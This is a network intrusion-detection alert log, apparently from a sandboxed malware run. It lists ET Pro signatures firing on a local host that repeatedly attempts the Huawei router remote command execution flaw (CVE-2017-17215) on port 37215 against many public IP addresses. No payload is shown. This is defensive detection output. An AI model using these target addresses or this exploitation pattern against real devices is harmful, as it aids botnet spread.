                                                    07/10/24-08:26:11.494095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4087037215192.168.2.1441.122.12.150
                                                    07/10/24-08:26:53.199768TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5306637215192.168.2.1441.63.121.16
                                                    07/10/24-08:26:20.152800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5818837215192.168.2.14157.54.96.72
                                                    07/10/24-08:26:17.951496TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5469637215192.168.2.14197.67.12.234
                                                    07/10/24-08:26:13.805293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5281837215192.168.2.14197.26.165.34
                                                    07/10/24-08:26:22.219271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4905437215192.168.2.14157.216.105.18
                                                    07/10/24-08:26:28.850187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4792237215192.168.2.14197.59.35.6
                                                    07/10/24-08:26:25.433711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4141237215192.168.2.14197.53.159.173
                                                    07/10/24-08:27:20.515408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3449037215192.168.2.14197.155.162.170
                                                    07/10/24-08:27:20.498164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4517437215192.168.2.1441.174.141.5
                                                    07/10/24-08:26:36.392999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5445037215192.168.2.14197.103.177.179
                                                    07/10/24-08:27:17.061013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6007437215192.168.2.14157.32.19.40
                                                    07/10/24-08:27:31.439490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4473837215192.168.2.14197.198.24.20
                                                    07/10/24-08:27:10.535959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3657637215192.168.2.1472.167.231.224
                                                    07/10/24-08:26:29.833709TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3504237215192.168.2.1441.126.33.65
                                                    07/10/24-08:26:34.196325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3686037215192.168.2.1441.41.78.43
                                                    07/10/24-08:26:49.824367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4021837215192.168.2.14157.96.40.129
                                                    07/10/24-08:26:41.545793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3715237215192.168.2.14197.78.126.147
                                                    07/10/24-08:26:43.530695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4705637215192.168.2.14157.0.136.239
                                                    07/10/24-08:27:14.881781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3699037215192.168.2.1441.151.36.112
                                                    07/10/24-08:27:30.554316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5487037215192.168.2.1441.63.108.234
                                                    07/10/24-08:27:34.122739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5618037215192.168.2.14212.177.246.207
                                                    07/10/24-08:26:55.308630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3985437215192.168.2.14197.220.139.69
                                                    07/10/24-08:27:13.930927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3551837215192.168.2.14197.136.164.136
                                                    07/10/24-08:26:15.881754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3376837215192.168.2.1441.154.211.85
                                                    07/10/24-08:26:22.260585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5898637215192.168.2.14197.180.141.171
                                                    07/10/24-08:27:27.151172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6061037215192.168.2.1441.144.166.9
                                                    07/10/24-08:26:29.766220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4309637215192.168.2.14157.153.10.149
                                                    07/10/24-08:26:59.539050TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4845837215192.168.2.14197.133.198.27
                                                    07/10/24-08:26:59.640605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4678837215192.168.2.1441.144.159.68
                                                    07/10/24-08:26:26.600322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5767637215192.168.2.14197.219.41.185
                                                    07/10/24-08:26:57.682664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5405037215192.168.2.14157.76.67.165
                                                    07/10/24-08:27:30.419826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5375237215192.168.2.14157.147.74.99
                                                    07/10/24-08:26:11.149960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4720637215192.168.2.14197.60.100.141
                                                    07/10/24-08:26:43.703556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4093437215192.168.2.1441.213.7.246
                                                    07/10/24-08:26:22.243127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5758237215192.168.2.14197.172.1.87
                                                    07/10/24-08:26:15.865384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5170437215192.168.2.14197.136.237.200
                                                    07/10/24-08:27:19.298616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3674237215192.168.2.1486.37.82.196
                                                    07/10/24-08:26:25.497334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4141437215192.168.2.1441.130.84.190
                                                    07/10/24-08:26:18.013020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3785237215192.168.2.14157.121.62.201
                                                    07/10/24-08:26:20.177629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4463837215192.168.2.1444.116.213.33
                                                    07/10/24-08:26:25.508243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3343837215192.168.2.1441.207.149.184
                                                    07/10/24-08:26:59.686618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5397237215192.168.2.14106.73.60.74
                                                    07/10/24-08:26:51.999483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4949837215192.168.2.1441.97.29.98
                                                    07/10/24-08:26:15.858542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3616237215192.168.2.1496.94.61.237
                                                    07/10/24-08:27:32.563593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5185837215192.168.2.14157.102.26.37
                                                    07/10/24-08:26:29.832636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5059637215192.168.2.14197.131.229.113
                                                    07/10/24-08:26:36.375795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5255037215192.168.2.14157.213.126.122
                                                    07/10/24-08:27:20.514336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5176637215192.168.2.14218.185.108.209
                                                    07/10/24-08:27:13.990374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4639437215192.168.2.14157.8.233.29
                                                    07/10/24-08:27:10.632991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5978037215192.168.2.1441.247.14.126
                                                    07/10/24-08:27:28.160478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4698237215192.168.2.14157.140.40.243
                                                    07/10/24-08:26:22.229763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4062037215192.168.2.1441.81.105.236
                                                    07/10/24-08:26:29.841830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3552837215192.168.2.1441.147.227.4
                                                    07/10/24-08:26:34.193253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4836237215192.168.2.1441.55.176.123
                                                    07/10/24-08:27:33.837652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6064837215192.168.2.1441.37.174.62
                                                    07/10/24-08:26:28.927122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3441237215192.168.2.14157.239.55.1
                                                    07/10/24-08:26:28.750375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3566437215192.168.2.1441.33.80.10
                                                    07/10/24-08:26:34.214709TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4090437215192.168.2.14171.168.92.205
                                                    07/10/24-08:27:19.327532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5029037215192.168.2.1441.235.71.6
                                                    07/10/24-08:26:41.463564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3941237215192.168.2.1488.47.81.195
                                                    07/10/24-08:27:33.792052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4445437215192.168.2.1441.220.244.76
                                                    07/10/24-08:26:55.369458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3945437215192.168.2.14203.161.174.220
                                                    07/10/24-08:27:10.742603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4434637215192.168.2.1444.201.4.233
                                                    07/10/24-08:26:36.431217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3362437215192.168.2.14157.208.20.186
                                                    07/10/24-08:27:10.660823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5242237215192.168.2.14157.246.22.227
                                                    07/10/24-08:26:13.775247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3721237215192.168.2.14157.133.113.199
                                                    07/10/24-08:27:24.997758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3717237215192.168.2.14102.158.90.106
                                                    07/10/24-08:26:28.926953TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6037637215192.168.2.14157.214.103.78
                                                    07/10/24-08:26:49.818976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3458637215192.168.2.14210.206.174.75
                                                    07/10/24-08:26:28.782504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3397237215192.168.2.14157.159.55.18
                                                    07/10/24-08:26:59.647956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5610837215192.168.2.14157.246.45.84
                                                    07/10/24-08:26:57.670723TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5928037215192.168.2.14197.159.210.187
                                                    07/10/24-08:26:38.641366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4419637215192.168.2.14197.68.144.246
                                                    07/10/24-08:27:27.096599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3969637215192.168.2.14197.72.109.188
                                                    07/10/24-08:26:11.128878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3617237215192.168.2.14157.23.38.169
                                                    07/10/24-08:27:27.121135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5864037215192.168.2.1441.38.21.187
                                                    07/10/24-08:26:52.054168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5216037215192.168.2.1479.221.110.16
                                                    07/10/24-08:26:31.078993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5045437215192.168.2.14157.240.32.46
                                                    07/10/24-08:26:55.447518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3719837215192.168.2.14116.206.248.120
                                                    07/10/24-08:26:11.554778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5972037215192.168.2.14135.93.169.69
                                                    07/10/24-08:26:55.432680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4991837215192.168.2.14162.125.112.46
                                                    07/10/24-08:26:48.012279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3526437215192.168.2.14197.151.33.177
                                                    07/10/24-08:27:32.593829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618637215192.168.2.14219.127.139.158
                                                    07/10/24-08:26:33.201608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3364037215192.168.2.14164.235.61.82
                                                    07/10/24-08:26:25.499192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4184637215192.168.2.1441.210.74.25
                                                    07/10/24-08:27:05.234090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4115237215192.168.2.14157.10.135.138
                                                    07/10/24-08:27:13.892094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5044437215192.168.2.1441.34.196.252
                                                    07/10/24-08:27:23.873303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3475637215192.168.2.14128.111.217.199
                                                    07/10/24-08:26:53.184218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5857037215192.168.2.14115.173.29.231
                                                    07/10/24-08:26:59.664822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5262037215192.168.2.1441.184.248.218
                                                    07/10/24-08:27:03.033670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6015637215192.168.2.1466.223.64.230
                                                    07/10/24-08:27:02.966535TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3718637215192.168.2.1441.77.207.53
                                                    07/10/24-08:27:30.406013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5852437215192.168.2.14157.200.219.2
                                                    07/10/24-08:27:05.114349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6091437215192.168.2.1441.93.34.109
                                                    07/10/24-08:27:33.901645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5300637215192.168.2.14197.177.162.244
                                                    07/10/24-08:26:43.685142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4493837215192.168.2.14197.8.27.253
                                                    07/10/24-08:26:20.165176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4964437215192.168.2.14197.23.102.212
                                                    07/10/24-08:26:29.808403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5880237215192.168.2.14157.176.189.199
                                                    07/10/24-08:27:16.990207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4905837215192.168.2.1441.231.105.231
                                                    07/10/24-08:26:33.183618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5824237215192.168.2.1432.97.111.143
                                                    07/10/24-08:26:43.757407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5437637215192.168.2.14157.16.101.218
                                                    07/10/24-08:27:07.262409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5227637215192.168.2.14197.245.134.92
                                                    07/10/24-08:27:02.980923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3674037215192.168.2.14197.35.216.76
                                                    07/10/24-08:26:18.010267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5361437215192.168.2.14186.69.250.127
                                                    07/10/24-08:27:07.298138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4004437215192.168.2.1441.35.182.101
                                                    07/10/24-08:26:18.024186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5478037215192.168.2.1460.58.113.204
                                                    07/10/24-08:26:23.318563TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3732837215192.168.2.14197.86.155.2
                                                    07/10/24-08:27:22.877679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4060437215192.168.2.14197.91.249.160
                                                    07/10/24-08:27:24.989466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4449437215192.168.2.14157.247.194.15
                                                    07/10/24-08:26:23.296739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5895237215192.168.2.1441.235.90.27
                                                    07/10/24-08:27:24.969390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5846037215192.168.2.1492.53.236.75
                                                    07/10/24-08:26:59.528584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5885837215192.168.2.14157.139.207.238
                                                    07/10/24-08:27:22.571545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4997237215192.168.2.14161.229.151.202
                                                    07/10/24-08:26:22.278115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5682437215192.168.2.14158.227.224.175
                                                    07/10/24-08:26:47.871507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5063437215192.168.2.14157.72.171.197
                                                    07/10/24-08:27:22.799638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5696237215192.168.2.14197.207.74.175
                                                    07/10/24-08:26:15.827903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4472437215192.168.2.14197.23.228.64
                                                    07/10/24-08:26:43.655824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4282237215192.168.2.14197.0.222.47
                                                    07/10/24-08:27:10.654504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4099037215192.168.2.1441.211.100.115
                                                    07/10/24-08:26:23.284059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4665837215192.168.2.14122.41.133.250
                                                    07/10/24-08:26:51.973462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3335637215192.168.2.1441.93.75.94
                                                    07/10/24-08:26:49.831923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3326037215192.168.2.1441.98.82.190
                                                    07/10/24-08:27:19.148298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4434637215192.168.2.14197.41.160.138
                                                    07/10/24-08:26:45.612875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4913837215192.168.2.14197.221.150.24
                                                    07/10/24-08:26:22.295536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5726237215192.168.2.14157.9.54.55
                                                    07/10/24-08:27:17.005251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3727637215192.168.2.1441.172.138.122
                                                    07/10/24-08:27:13.714524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3889237215192.168.2.1441.109.65.208
                                                    07/10/24-08:27:13.949060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4478437215192.168.2.14197.119.34.134
                                                    07/10/24-08:26:28.926609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6071637215192.168.2.14189.32.37.174
                                                    07/10/24-08:26:33.175812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5854837215192.168.2.14151.239.82.219
                                                    07/10/24-08:26:42.161476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4190637215192.168.2.14197.167.84.137
                                                    07/10/24-08:27:33.802281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5505037215192.168.2.14157.93.71.248
                                                    07/10/24-08:26:20.080140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5064237215192.168.2.14197.113.63.111
                                                    07/10/24-08:27:23.959862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4646637215192.168.2.14197.190.246.202
                                                    07/10/24-08:27:32.581630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4833237215192.168.2.1441.68.142.10
                                                    07/10/24-08:27:23.934351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4383237215192.168.2.14157.189.50.151
                                                    07/10/24-08:26:41.500844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5693437215192.168.2.141.112.78.57
                                                    07/10/24-08:26:41.625693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3313837215192.168.2.14122.197.221.92
                                                    07/10/24-08:26:43.763647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5365637215192.168.2.14157.158.114.234
                                                    07/10/24-08:27:19.215943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5642837215192.168.2.14157.204.205.70
                                                    07/10/24-08:27:19.238531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5350837215192.168.2.14157.125.53.24
                                                    07/10/24-08:27:27.076918TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4126637215192.168.2.14112.172.193.250
                                                    07/10/24-08:26:14.735455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5258637215192.168.2.14197.45.77.62
                                                    07/10/24-08:27:19.265032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6058037215192.168.2.14197.229.3.255
                                                    07/10/24-08:27:33.719591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3482237215192.168.2.1441.158.219.207
                                                    07/10/24-08:26:28.743244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3447837215192.168.2.14197.41.211.137
                                                    07/10/24-08:27:28.124721TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4670637215192.168.2.1490.113.51.77
                                                    07/10/24-08:26:18.038406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4727237215192.168.2.14157.112.39.247
                                                    07/10/24-08:27:13.879424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3752837215192.168.2.14197.115.67.85
                                                    07/10/24-08:27:23.817367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4471437215192.168.2.1441.80.231.172
                                                    07/10/24-08:26:22.300900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4629037215192.168.2.14197.132.133.5
                                                    07/10/24-08:26:25.525521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3785837215192.168.2.1439.195.59.35
                                                    07/10/24-08:27:13.804440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5703037215192.168.2.14197.29.162.250
                                                    07/10/24-08:26:22.275564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3446437215192.168.2.14216.52.203.244
                                                    07/10/24-08:27:27.174568TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4569237215192.168.2.14123.0.38.167
                                                    07/10/24-08:27:24.912875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5357237215192.168.2.1441.113.167.99
                                                    07/10/24-08:26:55.442575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4933037215192.168.2.14197.198.243.14
                                                    07/10/24-08:26:29.762574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5032037215192.168.2.1442.219.22.8
                                                    07/10/24-08:27:23.457605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6036037215192.168.2.14197.129.5.176
                                                    07/10/24-08:27:19.312425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3311837215192.168.2.14157.44.191.52
                                                    07/10/24-08:26:55.289517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5346637215192.168.2.14197.117.201.224
                                                    07/10/24-08:27:19.298616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5961037215192.168.2.14197.146.94.87
                                                    07/10/24-08:27:23.949605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5356237215192.168.2.14197.106.223.45
                                                    07/10/24-08:26:11.466916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5600637215192.168.2.14157.233.213.23
                                                    07/10/24-08:27:11.496514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3581037215192.168.2.14197.78.45.100
                                                    07/10/24-08:27:13.894598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3740037215192.168.2.1437.71.87.238
                                                    07/10/24-08:27:16.985380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4857237215192.168.2.14200.165.157.51
                                                    07/10/24-08:27:02.970301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5075437215192.168.2.14197.10.176.71
                                                    07/10/24-08:27:07.393552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3887037215192.168.2.14197.196.79.168
                                                    07/10/24-08:26:17.980540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4750437215192.168.2.14190.242.55.63
                                                    07/10/24-08:27:13.911358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3641037215192.168.2.1445.32.91.193
                                                    07/10/24-08:26:41.517439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3684837215192.168.2.1441.151.63.119
                                                    07/10/24-08:27:24.928816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3351437215192.168.2.14192.89.31.247
                                                    07/10/24-08:26:23.303062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3940037215192.168.2.14157.26.14.125
                                                    07/10/24-08:27:03.011649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3417437215192.168.2.14216.69.222.84
                                                    07/10/24-08:26:14.803775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4293837215192.168.2.1441.43.49.90
                                                    07/10/24-08:27:10.632992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4823237215192.168.2.14150.252.222.200
                                                    07/10/24-08:26:57.684476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4824637215192.168.2.14112.179.12.206
                                                    07/10/24-08:27:08.323465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4408837215192.168.2.1441.71.198.110
                                                    07/10/24-08:26:18.017676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3677837215192.168.2.1444.86.7.156
                                                    07/10/24-08:26:55.454904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4094837215192.168.2.14197.31.188.218
                                                    07/10/24-08:26:14.762388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5038637215192.168.2.1441.83.215.199
                                                    07/10/24-08:26:28.860348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5406037215192.168.2.1441.116.221.252
                                                    07/10/24-08:27:11.566038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5864237215192.168.2.1441.25.73.244
                                                    07/10/24-08:26:57.536379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3780437215192.168.2.14197.140.172.228
